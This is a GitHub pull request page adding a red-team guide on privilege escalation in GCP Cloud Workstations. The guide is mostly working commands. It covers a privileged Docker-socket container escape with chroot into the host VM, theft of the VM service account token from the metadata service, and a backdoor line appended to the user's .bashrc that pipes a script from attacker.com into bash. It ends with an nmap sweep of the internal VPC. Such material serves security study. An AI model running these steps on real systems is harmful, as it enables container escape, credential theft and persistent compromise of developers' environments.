Skip to content

Gcp workstations privesc & container escape [grte-bstevens] #257

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open
AI-redteam wants to merge 4 commits into
base: master
Choose a base branch
from
Open

Gcp workstations privesc & container escape [grte-bstevens] #257

Changes from all commits
Commits
Show all changes
4 commits
Select commit Hold shift + click to select a range
4a16d25
Add GCP Cloud Workstations privesc guide
AI-redteam Feb 9, 2026
6b1b232
Clean up GCP Cloud Workstations privilege escalation doc
AI-redteam Feb 9, 2026
0be98dc
Remove hacktricks-training banner from documentation
AI-redteam Feb 9, 2026
2bb1292
Remove countermeasures from GCP privilege escalation doc
AI-redteam Feb 9, 2026
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
109 changes: 109 additions & 0 deletions ...g-cloud/gcp-security/gcp-privilege-escalation/gcp-cloud-workstations-privesc.md
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,109 @@
# GCP - Cloud Workstations Privesc


### Container Breakout via Docker Socket (Container -> VM -> Project)

The primary privilege escalation path in Cloud Workstations stems from the requirement to support **Docker-in-Docker (DinD)** workflows for developers. When the workstation configuration mounts the Docker socket or allows privileged containers (a common configuration), an attacker inside the workstation container can escape to the underlying Compute Engine VM and steal its service account token.

**Prerequisites:**
- Access to a Cloud Workstation terminal (via SSH, compromised session, or stolen credentials)
- The workstation configuration must mount `/var/run/docker.sock` or enable privileged containers

**Architecture context:** The workstation is a container (Layer 3) running on a Docker/Containerd runtime (Layer 2) on a GCE VM (Layer 1). The Docker socket gives direct access to the host's container runtime.

> [!NOTE]
> The tool [gcp-workstations-containerEscapeScript](https://github.com/AI-redteam/gcp-workstations-containerEscapeScript) automates the full container escape and drops you into a root shell on the host VM.

<details>

<summary>Step 1: Check for Docker socket</summary>

```bash
# Verify the Docker socket is available
ls -l /var/run/docker.sock
# Expected output: srw-rw---- 1 root docker 0 ...
```

</details>

<details>

<summary>Step 2: Escape to the host VM filesystem</summary>

We launch a privileged container, mounting the host's root directory to `/mnt/host`. We also share the host's network and PID namespace to maximize visibility.

```bash
# Spawn a privileged container mounting the host's root filesystem
docker run -it --rm --privileged --net=host --pid=host \
-v /:/mnt/host \
alpine sh

# Inside the new container, chroot into the host
chroot /mnt/host /bin/bash
```

You now have a **root shell on the underlying Compute Engine VM** (Layer 1).

</details>

<details>

<summary>Step 3: Steal the VM service account token from IMDS</summary>

```bash
# From the host VM, query the Instance Metadata Service
curl -s -H "Metadata-Flavor: Google" \
http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token

# Check which service account is attached
curl -s -H "Metadata-Flavor: Google" \
http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/email

# Check scopes (CRITICAL STEP)
curl -s -H "Metadata-Flavor: Google" \
http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/scopes
```

</details>

> [!CAUTION]
> **Check the Scopes!**
> Even if the attached Service Account is **Editor**, the VM might be restricted by access scopes.
> If you see `https://www.googleapis.com/auth/cloud-platform`, you have full access.
> If you only see `logging.write` and `monitoring.write`, you are limited to the **Network Pivot** and **Persistence** vectors below.

<details>

<summary>Step 4: Achieve Persistence (Backdoor the User)</summary>

Cloud Workstations mount a persistent disk to `/home/user`. Because the container user (usually `user`, UID 1000) matches the host user (UID 1000), you can write to the host's home directory. This allows you to backdoor the environment even if the workstation container is rebuilt.

```bash
# Check if you can write to the host's persistent home
ls -la /mnt/host/home/user/

# Drop a backdoor that executes next time the developer logs in
# Note: Do this from the container escape context
echo "curl http://attacker.com/shell | bash" >> /mnt/host/home/user/.bashrc
```

</details>

<details>

<summary>Step 5: Network Pivot (Internal VPC Access)</summary>

Since you share the host network namespace (`--net=host`), you are now a trusted node on the VPC. You can scan for internal services that allow access based on IP whitelisting.

```bash
# Install scanning tools on the host (if internet access allows)
apk add nmap

# Scan the internal VPC subnet
nmap -sS -p 80,443,22 10.0.0.0/8
```

</details>